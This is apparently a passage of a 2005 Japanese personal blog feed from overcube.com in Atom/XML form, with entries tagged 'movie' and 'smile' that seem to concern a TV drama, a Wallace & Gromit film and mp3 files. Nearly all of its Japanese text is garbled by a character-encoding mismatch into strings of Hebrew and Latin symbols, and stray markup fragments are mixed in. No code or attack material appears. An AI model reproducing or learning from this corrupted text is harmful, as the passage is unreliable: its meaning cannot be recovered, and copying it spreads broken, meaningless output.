    -¿ְֶּ¡¡ײֻ²ָ¡׳₪ָ¸ֶ₪ײ₪ט₪¦»״ֶ³₪µ₪ל₪ֶ₪₪₪כ¡ֻ₪־ֲ¢₪«₪יָ¯·¡₪·₪ֶ₪­₪¿₪ג₪־₪ַ¡¢ֲַח₪־ּ₪¬₪¢₪ך₪₪¹¡£₪³₪³₪ֻ¼ּ₪·₪¿₪־₪־¡¢¿פֹ´ַ₪¯₪י₪₪₪־־ּ₪¬₪¢₪ך₪₪¹₪ְ¡£

    - -

    ₪₪₪ֱ₪׀₪ף¸ֵ₪₪₪ג₪־₪ַ₪ֿ¡¢¸µֿ½¡£
    -²¿₪־¸ֵ¸½ס₪«₪ָ₪₪₪¦₪ָ¡¢¸¢ֽר½ס₪ה¾¦ַה₪הּה²°₪ָ₪«₪־µצ²ִ¾₪ָ₪₪₪¦₪־₪«¡¢¾¸₪־־א₪ַ₪¹¡£

    - -

    ₪₪¼₪ֻ₪½₪־₪ט₪¦₪ג₪־₪¬₪₪₪ֳ₪ׁ₪₪₪¢₪כ₪־₪«¡£

    - -

    ¸ֵ¸½ס₪½₪־£²

    ]]> - ₪³₪־₪ט₪¦₪¥¹¥ָ¡¼¥ך¡¼₪ע»׳₪₪ֹג₪«₪₪ֶ₪¯₪ְ₪µ₪₪¡£
    »‏₪ֿ¸µֿ½¡£ְ¥¸ֶֽג₪־₪ָ₪¢₪כָֽ¡£¹ֱ₪ֿ₪µ₪₪¶₪₪¸×₪ַ₪ֻ₪®₪ן₪¦¡£
    -¹ֱ₪־¾¦₪₪₪ע°ל¼ך₪ֻ₪ֻ₪₪¦¥­¥­¥ח¡¼²°¡²¾ּ¾¡ֻ₪ֿ¡¢°­ֲו´±₪ָ₪ִ₪כ₪ף₪ְ°­ֱֶּה²°¡£
    -³¹₪־´יּע₪ַ₪ג₪¢₪ֳ₪ֶ¡¢¾¦ַה₪¬₪¦₪₪¯₪₪₪ֳ₪ֶ₪₪₪כֵ¹₪ע¸«₪ִ₪±₪כ₪ָ¡¢ֶףֲוּ₪־¼דֳ¶ֶב₪ָ÷©°ױ₪ֻ₪₪ך¡¢ֵׂ¾ל₪ֻ₪µ₪½₪¦¡£
    -¡ײ₪₪₪ה₪¢¡¢¼דֳ¶ֶב₪ֿ₪ף¡£₪µ₪¹₪¬₪ה¡£¾¦ַה₪ג¾ו¼ך₪₪י¡¢ַמֲַ₪־₪₪¦₪ג₪₪«₪₪«₪־₪ג₪ף₪ה¡£₪ָ₪ֶ₪ג½י₪ב₪ֶ₪₪µ₪כ₪ָ₪ֿ»׳₪ן₪ל₪₪״₪ף¡×¡׳
    -₪ָ÷ַ½י₪ֿ₪×₪ְ₪ֶ₪ֶ₪×₪₪₪ֶ¡¢₪א₪ֱ₪ד₪³₪±¶גִ₪ך¾ו₪²₪ֶ¡¢ֽ­₪ך¶ג»ִ₪י₪÷´¬₪­¾ו₪²₪כ¡£
    -¡ײ₪₪¡¢¼דֳ¶ֶב₪ֿ₪ף¡£÷£ֶ₪־₪ָ₪³₪ם₪ֿ¡¢₪¦₪ֱ₪«₪י₪־ֲ₪·₪ָ₪₪₪¦₪³₪ָ₪ֻ₪·₪ָ₪­₪₪¹₪µ₪«₪₪¡¢µ₪₪־÷ׁ₪א₪₪ַֽ·₪ף₪ַ₪₪₪­₪₪ֿ₪ל¡׳

    - -

    ₪³₪¦₪·₪ֲִֶֻח₪¼¶ג₪עת₪¨₪כ¼דֳ¶ֶב¡£₪ִ₪₪₪ֻ₪ֿ¡¢ֵ¹₪־¸¢ֽר½ס₪ע»‎₪ֱ½׀₪·₪ֶ¡¢
    -¡ײ₪³₪ל₪ַ÷ַ¸ו₪־₪ג₪¦₪ׂ₪ָ¾¡ֹי¡¢₪×´ך₪₪₪·₪₪¹¡×¡׳
    -¡ײ₪₪₪¦¡£ֵ¹₪־¸¢ֽר½ס₪ַ₪ף₪¡£₪¨₪¨₪ַ₪ֳ₪·₪ד₪ם¡£₪¡¢₪×µ₪₪־÷ׁ₪א₪₪ַ₪ה₪ך₪₪ֿ₪ל¡ִ₪¿₪ְ₪·¡¢₪³₪ל₪¬₪₪ף₪₪ֻ÷ַ¸ו₪־÷ַ¸ו₪ַ₪¹₪¼¡£₪³₪ל₪עֶמָ₪ַ₪ֿ¡¢£ֽ¡ץ£ֱ₪ָ¸ֶ₪ײ₪ף₪ְ₪¹¡£₪ׂ₪ׂ₪ׂ₪ׂ¡׳
    -₪³₪¦₪·₪ֶ¡¢ְטֲו₪¬·ל₪ָ´ְ₪ֳַ₪­¾ו₪²₪¿₪×ֵ¹₪ֿ¡¢°­₪־¥­¥­¥ח¡¼²°¡²¾ּ¾¡ֻ₪ֻ₪ט₪ֳ₪ֶ´¬₪­¾ו₪²₪ל₪ֶ₪·₪₪¦₪־₪ַ₪¢₪ֳ₪¿¡£
    -¼«¬₪־¶ע₪«₪µ₪ֻ₪ט₪¦₪ה₪¯µ₪₪ֵ₪₪₪¿¼דֳ¶ֶב₪ְֿהֹ₪«₪י¿ָ₪עֵך₪²¡¢ֽגִ«»אֲ־₪ֹֽֿױ₪ֲַֻ₪ֱ₪ִ₪±₪י₪ל₪כ¡£

    - -

    ¹גֱׂ ·ע [TX-6092] [¥¥¹¥¿¡¼]¡ײ₪¨₪י₪₪₪³₪ֳ₪ֱ₪ד¡¼¡×¡¡¼דֳ¶ֶב₪ֿ₪ף₪¬¡×¡¡¼דֳ¶ֶב₪ֿ₪ף₪¬¡×¡׳
    -ֱבִ«₪«₪י¼ד½°₪¬כ¾ף₪ע»‎₪ֳ₪ֶ¶מ₪±¹‏₪ף₪ַ₪¯₪כ¡£ֵ¹₪־ָײֶ¬¡¹גֱׂ·ע¡ֻ₪ֿ¡¢
    -¡ײ¥ֱ¥­¥·¥ח¡¼¥ֳ¡£₪×₪י₪¢¡¢₪ג₪¦¡¢¥¬¥¥ף₪ַ₪­₪ֽ¡¼¥ֳ¡׳
    -₪ָ₪₪¼₪«¹¾¸ֽ₪ֳ»ֹׂק₪ֻ¶מ₪±½׀₪·₪ֶ₪₪₪¯₪־₪ַ₪¢₪ֳ₪¿¡£
    -ֵ¹₪־±₪ַ₪ֿ¡¢ֲֹ¿ָ₪־ְטֲו₪¬·ד₪·₪¯³±₪­¹‏₪א¡£₪½₪־ַ״₪ע₪µ₪¹₪כ₪־₪ֿ¡¢ֶףֲוּ₪־²ַ₪ַ₪¢₪כ₪ָ₪³₪ם₪־¡¢ֶ£½ד»ׂ¡₪¸₪ִ₪ָֿײֶ¬¡¦¹גֱׂ·ע₪ִָֽ₪₪¸₪₪ַ¡¢ֵֻצ₪ֿ¹¥₪­₪¢₪ֳ₪ֶ₪₪₪כ¡ֻ¡£
    -¥«¥ב¥י₪ֿ¶ן₪±₪ֶ₪₪₪¯·ע₪µ₪ף₪־ַ״ֳז₪עִֹ₪¦¡£¹װ₪¯¼ך₪ֻ₪ֿ¡¢¥­¥­¥ח¡¼²°¡²¾ּ¾¡ֻ₪־²°ֹ₪¬¹ץ¡¹₪ָ₪½₪׃₪¨₪ֶ₪₪₪כ¡£
    -₪½₪·₪ֶ¡¢¥י¥¹¥ָ₪־ֱװְה₪²ּ₪·¹ח₪₪₪״₪ָ¡¢×¸ל₪ֿ₪₪ְ₪ל¹‏₪ף₪ַ₪₪₪¯₪־₪ַ₪¢₪ֳ₪¿¡£¡£

    ¡ִ₪₪¢¡¢»׳₪₪ֹג₪«₪₪ֶ₪ג₪י₪ֳ₪¿₪ְ₪±₪ַ¡¢¥ױ¥£¥¯¥·¥ח¥ף₪ַ₪¢₪ך¡¢¼ֲ÷₪־¿ֽס¦ֲֳִ־₪ָ₪ֿ´״·¸₪₪₪₪־₪ַ₪¹¡£₪₪₪₪ף₪ַ₪¹₪ט¡¢₪₪ף₪ָ₪ֻ(¡¨¡¦¢ֿ¡¦)

    - -

    ₪ָ₪ג₪¢₪ל¡¢₪ט₪ף₪ֹ₪³₪ם₪₪₪»צ¾נ₪ַ¡¢₪´ְטֱִֽֽ₪¬½ךֽ­₪¹₪כ₪ָ₪³₪ם₪ָ₪₪ֳ₪¿¸¢ֽר½ס₪־₪¿₪°₪₪₪ַ₪´₪¶₪₪₪₪¹¡£
    -¸¢ֽר₪ע¾ש₪ך¼ץ₪±₪כ₪ֻ₪¢₪¿₪ֳ₪ֶ¡¢ֽ‎ֽ³₪¬µ­₪µ₪ל₪¿₪ג₪־₪ג₪¢₪ך¡¢¡ײֱ°ַ₪¼װ₪־ֲױֻ‎₪־₪»₪₪₪ֳַֿ°ט₪־ֹקµ×₪¬ֽנ₪ל₪¿₪«₪י¡¢₪³₪־¼װ₪ֻ¸¢ֽר₪ע°ׁ¾ש₪¹₪כ¡׳₪ָ₪₪₪¦₪ט₪¦₪₪³₪ָ₪¬½ס₪«₪ל₪ֶ₪₪₪₪¹¡£
    -ֳֿ°ט₪־´יּע₪ְ₪ֳ₪¿₪ָ₪₪₪¦₪³₪ָ₪₪ף₪ַ₪·₪ח₪¦₪«¡ֳִ¼ֵ×₪ֻ¸ְ₪¨₪׀¡¢ֱ°₪ֻ¸¢־ֿ₪ע°®₪ֳ₪ֶ₪¿ֱָ₪ֻ¾¡₪ֳ₪¿₪ָ₪₪₪¦₪«(¡­ֽ¡®¡¨)¡¡¡ײֹקµ×₪¬ֽנ₪ל₪ֶ₪₪₪¿¡׳₪ֳ₪ֶ₪₪₪¦₪־₪ֿ¡¢¹³ֱט¾ץֲײ₪ֻ₪¢₪ֳ₪¿₪ף₪ַ₪ֿ¡£¡£

    - -

    ₪¹₪´₪₪ר₪·»ת₪־₪ג₪¢₪ֳ₪ֶ¡¢₪¢₪ף₪₪ךֶֹ₪ב₪₪₪₪ף₪ַ¡¢¾₪·₪₪₪³₪ָ₪ֿ₪ן₪«₪ף₪₪₪₪ף₪ַ₪¹₪¬¡¢¾¦ֹ₪´₪ָ₪ֻ¸¢ֽר₪ָ₪₪₪¦₪«ָּµצ₪ָ₪₪₪¦₪«¡¢₪½₪ף₪₪־₪¬₪¢₪ֳ₪¿₪₪¿₪₪₪ֻ¸«₪¨₪₪¹¡£₪₪ֻ₪«₪¢₪¯₪ֹ₪₪₪ה₪ך¸‎₪¬³ְ´ײ¸«₪¨₪₪¯₪ג₪₪₪₪ַ₪¹¡£
    -¶ג¡¶ה¡ֻ₪־ֲ₪·¼₪ך₪ָ¹ע×ֱך¾ל₪־₪ג₪־₪גֲ¿₪₪₪ַ₪¹¡£ֹװµשֹװ÷מ¡¢²׀÷ׂ₪₪ֹ₪־÷₪־¡¢µ÷ָׁסַֽׁ±½׀₪־₪₪₪₪ֳֿ₪ג₪¢₪ך₪₪¹¡₪½₪ל₪¬´יּע₪־»ֵ»צ₪י₪·₪₪¡ֻ¡£
    -·¼ט₪ך₪־·ן₪ג₪¢₪ֳ₪ֶ¡¢·₪ֿ₪¹₪ַ₪ֻ³ֽ₪ל₪ֶ₪ֶ¡¢·₪עַה₪כ¸¢ֽר₪¬ֳ¯₪ֻ₪¢₪כ₪«₪ע₪ב₪°₪כֳֿ₪־₪ט₪¦₪ַ₪¹¡£·₪־µנֲ־₪עֱ°₪ֻ¡¢₪₪₪ם₪ף₪¿ֽ₪¬½׀₪ֶ₪­₪ֶ₪ה₪ה₪³₪·₪₪¡£·₪ע³ֽ₪ֳ₪ֶ₪·₪₪ֳ₪¿¸ו₪ַ¡¢ַה₪כֳֿ₪ע»ֿ₪ב₪כ₪־₪¬¡¢₪־₪ף₪׃₪ך¥¥ּ¥±₪ַ¡¢ֽמ¸ל₪₪¿₪₪₪ַַּּע₪₪₪ַ₪¹¡£

    - -

    ¡ײֻ²ָ₪־ֲ¢¡׳₪ֿ¡¢»ׂ¶¡₪־÷¢₪×₪¸₪µ₪ף₪ֻ¹₪₪₪¿ֳֿ₪ַ₪ֿ¡¢¿ֽµ₪־¥¥₪¥י₪ג₪¢₪כ₪י₪·₪₪₪ַ₪¹¡£¥ֶ¥ל¥׃₪ג¼ט÷א₪ֻֽט₪¿₪ָ₪«¸ְ₪ֳ₪ֶ₪₪·₪¿₪¬¡¢₪×₪¸₪µ₪ף₪ֻ₪ְ₪₪µ₪ל₪ֶ₪כ²ִַ½ְ­₪¬¹ג₪₪₪ַ₪¹¡₪¿₪₪₪ֶ₪₪±³₪·₪«¸ְ₪ן₪₪₪¥ׂ¥ָ₪ְ₪ֳ₪¿¡ֻ¡£
    -±ף₪₪₪ף₪ַ₪¢₪₪ך¹װ₪±₪₪₪ֻ²ָ₪ַ₪¹₪¬¡ֳֽֿ‎ֵ×₪ֻ±ף₪₪₪ָ₪₪₪¦₪ט₪ך¡¢ֳ¼ֵ×₪ֻ¸ְ₪ֳ₪ֶ¡¢ל₪¬ֳח₪¬°­₪₪£ק¡ֻ¡¢¹װ₪ֳ₪¿»‏₪ֿ¡¢¿ְֶּ₪«₪ינ‏ם¦₪עַד₪₪₪₪¬₪י₪ג¡¢ֲ¢₪ע¥¬¥µֶ‏₪ל₪¹₪כ₪³₪ָ₪ֻ₪·₪ֶ₪₪₪₪¹¡£
    -¥₪¥ָ¥³₪ֿ₪ָ₪­₪ֹ₪­ֶ‏₪ֳ₪ֶ¡¢₪ב₪₪·₪₪ֹ₪ע¥ה¥ױ¥×¥¯₪ַַה₪ך₪µ₪׀₪₪₪ֶ₪₪₪כ₪ָ₪₪₪¦±½₪ַ₪¹¡£₪×₪ּ₪·₪ג₪₪«₪₪«₪־°­₪¸₪ד₪־₪¦¡¢₪ָ₪´ְטֱִֽֽ₪ֿ¶ל¾׀₪₪₪·₪ֶ₪כ₪ֻ₪ֱ₪¬₪₪₪₪₪¡£

    - -

    ₪³₪־¸ֵ¸½ס₪ע»ה₪¬»‎₪ֱ½׀₪·₪¿₪³₪ָ₪ֿ₪₪ף₪₪ֻ¹­₪₪ֳ₪ֶ₪₪₪ֶ¡¢»ה₪ֿ₪³₪ל₪ע³ט»ת₪ֻµ¯₪³₪¹»ָּ¿₪ע°ֵּ₪־₪¦₪ֱ₪ֻ°ת₪­¼ץ₪±₪µ₪»₪י₪ל₪ֶ₪כ₪י₪·₪₪¡£
    -²ֶµ₪₪ֻ¥₪¥ָ¥³₪«₪י¡¢¡ײ₪¢₪ל₪עֱ´ֹפֶֹ₪א₪־₪ֲֿחׁ₪ה₪ם¡׳₪ֵָגֶֽ₪ֻ°ײ₪ב₪־¸ְֽױ₪ע₪ג₪י₪₪¡¢₪½₪־₪³₪ָ₪¬ָ¯³׀₪·₪₪·₪¿¡£
    -₪½₪ף₪₪³₪ָ¡¢₪ַ₪­₪ף₪ֱ₪ו₪¦₪ֻ¡£»ה₪ֿ¸ֵ¸½סֶֹ₪ף₪ְ₪ך½׀ֽט₪₪»₪ף₪ֶ¡£₪ג¡¼¥«¥ף¥¥ף₪·₪ֶ₪¯₪ְ₪µ₪₪₪ט¡¼¡£
    -₪ג₪¦₪¹₪°₪×ְµ·מ₪₪־₪ַ¡¢¿ְֶּ₪ָ₪ג²ס₪¦₪«₪גֳ־₪ל₪÷¡¢₪¿₪₪₪״₪ף´ם¸±₪₪«₪×₪ך₪¬₪·₪₪¹¡£ֹ₪₪¿ֽ₪גֲ¿₪₪₪·₪¡¼¡£²₪ֻ₪ֿ¥ֹ¥¹₪עַ¦₪׀₪»₪ֶ¡¢₪×ְµ·מ₪ע·₪¨₪¿₪₪₪ָ»׳₪₪₪₪¹¡£¡¥ְ¥ב₪ְ¡¢₪³₪ף₪₪³₪ָ½ס₪₪₪¿₪י¡¢₪ב₪ֳ₪ֱ₪דֵ₪י₪ל₪ל₪½₪¦₪ְ¡ִֻ²ָ₪ָ₪־¿־µֱ₪₪­³־¼¹₪¬÷ֶַ³₪«¡×¡ֻ

    - -


    -ֵֽ²רֱנ»ז¡½₪¯₪÷₪·»תֶ‏ּח¥·¥ך¡¼¥÷ֶֻ¿ֽ₪־¼ך½¬₪₪
    ֵֽ²רֱנ»ז¡½₪¯₪÷₪·»תֶ‏ּח¥·¥ך¡¼¥÷ֶֻ¿ֽ₪־¼ך½¬₪₪

    - -


    -¡־·₪־·ן¡¢ִֹµ­¡ֿ

    - -

    ¸½ס₪עֶֹ₪ִ¾₪·₪ֶ₪₪כ₪ָ¡¢·₪־·ן₪ֿ₪³₪¦₪₪₪¦₪³₪ָ₪י₪·₪₪₪ַ₪¹¡£
    -₪₪÷¡¢ְ¥¸ֶֽג³₪₪ַ·₪¬₪ָ₪ל¡¢₪´ְטֱִֽֽ₪־¥·¥₪ַ₪¢₪כ¹ֱ₪ֻ¿וָֽ₪²₪µ₪ל₪כ¡£
    -·₪ֿ₪«₪₪ךֱִ₪·₪₪¡£₪µ₪ֶ₪³₪ל₪ע₪ֹ₪¦₪·₪¿₪ג₪־₪«¡£
    -²עֲ־₪־»ֵ‎₪¬₪ן₪«₪י₪₪₪₪ָ₪₪₪¦₪³₪ָ₪ג₪¢₪כ₪±₪ל₪ֹ¡¢¥¯¥¸¥י₪ֻ₪ג¥¯¥¸¥י»װ¾ל₪¬₪¢₪ֳ₪ֶ¡¢¥¯¥¸¥י₪ע¾¦₪¦₪־₪ֻ₪ג¸¢ֽר₪ה₪יֳֶ¸¢¡¢ֳֶµצ₪הֳר÷מ¸¢₪¬₪¢₪כ(¾׀)¡£
    -₪ָ₪ֻ₪«₪¯¾¡¼ך₪ַֻהַד₪¹₪כ₪ָ¡¢₪ֹ₪³₪«₪י¸¶ח₪¬½׀₪כ₪«₪ן₪«₪י₪₪₪¡£ֱך¾ל₪גֶׁ°₪¹₪ל₪׀¡¢ֲ¿‎ּּ₪ֲַֻּֿ₪¬₪«₪«₪כ¡£
    -₪½₪ל₪ַ¡¢ֲ¾ָֽ₪ג´¬₪­¹‏₪ף₪ַ¡¢µצ²ִ₪ע¼ט₪ך₪ִ₪±₪כֱ₪®₪ֻ¡£
    -¹¾¸ֽ»‏ֲו¸ו´¡¢²¿₪ע₪¹₪כ₪ֻ₪ג₪ָ₪ֻ₪«₪¯¡¢³ֶ‎ּּ₪־´ְֶ¸¢±׳¼װ₪־ִ´ְ°₪¬ֹ¬ֽ׳¡£₪½₪ל₪ַ¾¸₪¬₪₪₪ֳ₪ׁ₪₪₪ֻ₪₪ֳ₪ֱ₪ד₪¦₪ט₪¦₪ַ₪¹¡£
    -₪·₪«₪·¡¢₪½₪¦₪³₪¦₪·₪ֶ₪כ₪¦₪ֱ₪ֻ₪ג¡¢¥¯¥¸¥י₪ֿ₪ֹ₪ף₪ֹ₪ףֹו₪ֳ₪ֶ₪₪₪¯₪־₪ַ₪¢₪ֳ₪¿¡£
    -¡ִ₪₪ף₪ֶ¥¥ּ¥±₪ֳֿ₪₪ף₪ְ¡ִ¸½ֲו₪ָ₪₪₪ֳ₪·₪ח₪ַ₪¹₪ֽ¡£¡ײ₪¨₪¨₪¸₪ד₪₪₪₪«¡׳₪ג°¿·₪ג¡¢₪½₪¦±ף₪¯₪₪₪»‏ֲו₪־½׀ֽט»צ₪₪ך¡£

    ]]> -
    -
    - - ֽט½µ₪־¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹₪ֿ - - 2005-12-03T14:07:15Z - 2005-12-03T23:07:15+09:00 - tag:www.overcube.com,2005:/blog//2.669 - 2005-12-03T14:07:15Z - ֻט½µֵֶֻֽ¡¢ִ«£·»‏£³£°¬₪«₪יֱקֳז₪־¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹¡£ ¥³¥ף¥»¥׳¥ָ₪ֿ¥׀¥ֳ¥¯¡¦¥ָ¥¥¡¦¥¶¡¦¥¥₪¥·¥ֳ¥¯¡₪₪־₪«¡ֻ¡£ ½יֲו¥¦¥כ¥ָ¥י¥¥ף₪־¹ץֹפ¿¡¦÷ש°ז¹ְ»ׂ₪¬¥ל¥®¥ו¥י¡¼½׀±י₪·¡¢¥ל¥ֳ¥ֹ¥­¥ף¥°₪ה¥װ¥°¥ג¥ף¡¢¥¼¥ֳ¥ָ¥ף₪₪ֹ₪₪ִ₪«₪·₪־²ר½ֳ¡¦±§ֳט¿ֽ₪¬ֵ׀¾ל¡£±ֳ«¥׳¥ם₪ֻ₪ט₪כ¥×¥ה¥¸»¦₪·₪ַ₪¹¡³(¡­¡¼¡®)¥־ ´ִֶֶ₪ג¡¢¶ג»ׂ½₪²נ¡¢»°ֳ׃¿ע»ֻ¡¢ָ׃ֵחֹׂ¹¨¡¢₪½₪·₪ֶ¼ֱֲך»¾¼ֽ÷₪י¡¢¹כ²₪ּּ¡¹¡£ ₪µ₪ֶ¡¢ֽט½µ₪־¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹₪ֿ¡¢¼ֱֲך»¾¼ֽ÷´ִֶֶ₪ַ¡¢₪₪ף₪ָ₪¢₪־ּ¾÷מ¡ײ¥¦¥כ¥ָ¥י¥»¥ײ¥ף¡¦ְֱ₪ן₪ל₪¿³¹¡׳₪־ֲ³װ¡¡©¡ֻ₪¬ֵ׀¾ל₪·₪₪¹¡£ ֲךּ¾₪ֿ¡¢¡ײְֱ₪ן₪ל₪₪₪³¹¡׳¡× ¥ב¥ָ¥ם¥ףְ±¿ֽ¡¢₪½₪·₪ֶ₪ֱ₪ד₪ײֲז₪ג÷ֶ¸½₪µ₪ל₪כ₪ג₪ט₪¦₪ַ₪¹¡£ ְט½µ¡£±£±·מ£²£¶ֱֶק¡ֻ₪־¡ײ¸ױִ³₪־ּ´¡׳₪ג¼ֱֲך»´ִֶֶ÷מֹ₪ַ¡¢₪³₪ל₪ֿ½¨°ן₪¥ב¥¿¥ױ¥£¥¯¥·¥ח¥ף₪ַ₪·₪¿¡£ »ׂ₪ֹ₪ג₪¬¸«₪כ₪³₪ָ₪₪ֹ₪₪ֳ₪¿₪¯ֱִך³°¡£¥¦¥כ¥ָ¥י¥¥ף¥·¥ך¡¼¥÷₪ַ₪¢₪כ₪³₪ָ₪µ₪¨ֶף₪־¼¡¡£´ִֶֶ₪¬₪ה₪ך₪¿₪₪₪³₪ָ₪ע₪ה₪כ¡£ ₪·₪«₪·¡¢₪³₪ל₪³₪½₪¬¡¢¼ֱֲך»´ִֶֶ₪־₪א₪«₪·₪«₪י₪ה₪ך₪«₪¿¡£²־ָײֱָ₪ַ¡¢ָ‏¶ץ₪ׂ₪׀₪ך¡₪ְ₪ֳ₪¿₪«¡ֻ₪־ֹ¡₪־·ך₪ע¥¢¥ֳ¥׳₪ֻ₪·₪¹₪®₪ֶ´³₪µ₪ל₪כ₪³₪ָ₪«₪י¡¢±ֱַ₪־¥­¥ד¥ך¥¢₪ע»ֿ₪ב₪¿¿ֽ₪ַ₪¹₪«₪י(¡¨¡¦¢ֿ¡¦) ֽט½µ₪¬³₪·₪₪ַ₪¹¡£ֻ÷₪ל₪ף₪ט₪¦₪ֻ₪»₪ֽ₪׀(₪½₪־ֵּ×₪ַ₪³₪־µ­»צ₪ֿ½ס₪«₪ל₪¿)¡£ ¢£²ר½ֳ₪־₪¢₪±₪₪־¡ִ¡ײ²ר½ֳ₪־ֹד¡׳¹ג»³־ֹ÷צ₪־ְ¸³¶₪עֱֹ₪¯¥ֹ¥­¥ו¥ב¥ף¥¿¥ך¡¼¡£¼ֱֲך»¾¼ֽ÷´ֶ½₪¡£Gyao₪ֱַקֳז₪ַ₪¹¡¸½÷ֲט£¶²ף¡ֻ¡£... - - overQ - - - - movie - - ¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹ 1ֻט½µֵֶֻֽ¡¢ִ«£·»‏£³£°¬₪«₪יֱקֳז₪־¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹¡£
    -¥³¥ף¥»¥׳¥ָ₪ֿ¥׀¥ֳ¥¯¡¦¥ָ¥¥¡¦¥¶¡¦¥¥₪¥·¥ֳ¥¯¡₪₪־₪«¡ֻ¡£
    -½יֲו¥¦¥כ¥ָ¥י¥¥ף₪־¹ץֹפ¿¡¦÷ש°ז¹ְ»ׂ₪¬¥ל¥®¥ו¥י¡¼½׀±י₪·¡¢¥ל¥ֳ¥ֹ¥­¥ף¥°₪ה¥װ¥°¥ג¥ף¡¢¥¼¥ֳ¥ָ¥ף₪₪ֹ₪₪ִ₪«₪·₪־²ר½ֳ¡¦±§ֳט¿ֽ₪¬ֵ׀¾ל¡£±ֳ«¥׳¥ם₪ֻ₪ט₪כ¥×¥ה¥¸»¦₪·₪ַ₪¹¡³(¡­¡¼¡®)¥־
    -´ִֶֶ₪ג¡¢¶ג»ׂ½₪²נ¡¢»°ֳ׃¿ע»ֻ¡¢ָ׃ֵחֹׂ¹¨¡¢₪½₪·₪ֶ¼ֱֲך»¾¼ֽ÷₪י¡¢¹כ²₪ּּ¡¹¡£

    - -

    ₪µ₪ֶ¡¢ֽט½µ₪־¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹₪ֿ¡¢¼ֱֲך»¾¼ֽ÷´ִֶֶ₪ַ¡¢₪₪ף₪ָ₪¢₪־ּ¾÷מ¡ײ¥¦¥כ¥ָ¥י¥»¥ײ¥ף¡¦ְֱ₪ן₪ל₪¿³¹¡׳₪־ֲ³װ¡¡©¡ֻ₪¬ֵ׀¾ל₪·₪₪¹¡£
    -ֲךּ¾₪ֿ¡¢¡ײְֱ₪ן₪ל₪₪₪³¹¡׳¡×
    -¥ב¥ָ¥ם¥ףְ±¿ֽ¡¢₪½₪·₪ֶ₪ֱ₪ד₪ײֲז₪ג÷ֶ¸½₪µ₪ל₪כ₪ג₪ט₪¦₪ַ₪¹¡£

    - -

    ְט½µ¡£±£±·מ£²£¶ֱֶק¡ֻ₪־¡ײ¸ױִ³₪־ּ´¡׳₪ג¼ֱֲך»´ִֶֶ÷מֹ₪ַ¡¢₪³₪ל₪ֿ½¨°ן₪¥ב¥¿¥ױ¥£¥¯¥·¥ח¥ף₪ַ₪·₪¿¡£
    -»ׂ₪ֹ₪ג₪¬¸«₪כ₪³₪ָ₪₪ֹ₪₪ֳ₪¿₪¯ֱִך³°¡£¥¦¥כ¥ָ¥י¥¥ף¥·¥ך¡¼¥÷₪ַ₪¢₪כ₪³₪ָ₪µ₪¨ֶף₪־¼¡¡£´ִֶֶ₪¬₪ה₪ך₪¿₪₪₪³₪ָ₪ע₪ה₪כ¡£
    -₪·₪«₪·¡¢₪³₪ל₪³₪½₪¬¡¢¼ֱֲך»´ִֶֶ₪־₪א₪«₪·₪«₪י₪ה₪ך₪«₪¿¡£²־ָײֱָ₪ַ¡¢ָ‏¶ץ₪ׂ₪׀₪ך¡₪ְ₪ֳ₪¿₪«¡ֻ₪־ֹ¡₪־·ך₪ע¥¢¥ֳ¥׳₪ֻ₪·₪¹₪®₪ֶ´³₪µ₪ל₪כ₪³₪ָ₪«₪י¡¢±ֱַ₪־¥­¥ד¥ך¥¢₪ע»ֿ₪ב₪¿¿ֽ₪ַ₪¹₪«₪י(¡¨¡¦¢ֿ¡¦)

    - -

    ֽט½µ₪¬³₪·₪₪ַ₪¹¡£ֻ÷₪ל₪ף₪ט₪¦₪ֻ₪»₪ֽ₪׀(₪½₪־ֵּ×₪ַ₪³₪־µ­»צ₪ֿ½ס₪«₪ל₪¿)¡£

    - -

    ¢£²ר½ֳ₪־₪¢₪±₪₪־¡ִ¡ײ²ר½ֳ₪־ֹד¡׳¹ג»³־ֹ÷צ₪־ְ¸³¶₪עֱֹ₪¯¥ֹ¥­¥ו¥ב¥ף¥¿¥ך¡¼¡£¼ֱֲך»¾¼ֽ÷´ֶ½₪¡£Gyao₪ֱַקֳז₪ַ₪¹¡¸½÷ֲט£¶²ף¡ֻ¡£

    ]]> - -
    -
    - - mp3₪־ֱׁ« - - 2005-11-30T12:19:10Z - 2005-11-30T21:19:10+09:00 - tag:www.overcube.com,2005:/blog//2.665 - 2005-11-30T12:19:10Z - ₪«₪ִ₪ֶ¡¢£ם£נ£³₪ֿ¡¢¿ֽ־א₪־ֵ¨₪ַ₪¢₪ֳ₪¿¡£¿ֽ־א₪ֿ£ם£נ£³₪ֻ₪ט₪ֳ₪ֶַּ₪׃₪כ±¿ּ¿₪ֻ₪¢₪ֳ₪¿₪־₪ַ₪¹¡£(₪¢₪ָ¡¢£²£°£°£°ַ¯ּהֲך)... - - overQ - - - - smile - -
    -

    -

    - -

    ₪«₪ִ₪ֶ¡¢£ם£נ£³₪ֿ¡¢¿ֽ־א₪־ֵ¨₪ַ₪¢₪ֳ₪¿¡£¿ֽ־א₪ֿ£ם£נ£³₪ֻ₪ט₪ֳ₪ֶַּ₪׃₪כ±¿ּ¿₪ֻ₪¢₪ֳ₪¿₪־₪ַ₪¹¡£(₪¢₪ָ¡¢£²£°£°£°ַ¯ּהֲך)

    ]]> - ₪³₪־±ַ²ט₪¬÷מ₪י₪ל₪¿₪־₪ֿ¡¢₪₪ף₪־ֶף»°ַ¯ֱ°₪־₪³₪ָ¡£(¸¶ֲך₪ֿ¡ײ£ֽ£׀£³¡׳₪ַ₪ֿ₪₪₪₪½₪¦₪ַ₪¹¡£²»³¥ױ¥¡¥₪¥כ₪ַ´¶ְק₪¹₪כ¥¦¥£¥כ¥¹₪ַ¡¢¥ׁ¥ֻ¥ֳ¥¯₪ֻ₪₪כ₪ט₪¦₪ֳֿ₪י₪·₪₪¡£¸«₪¿₪³₪ָ₪ֿ₪₪₪¡£₪ָ₪¯₪ֻ¸«₪¿₪¯₪ֿ₪₪₪¡£₪·₪«₪·¾¯₪·₪ֿ¸«₪ֶ₪₪¿₪₪¡£)

    - -

    ₪½₪ל₪¬÷£₪ַ₪ֿ₪ֹ₪¦₪ַ₪·₪ח₪¦¡£
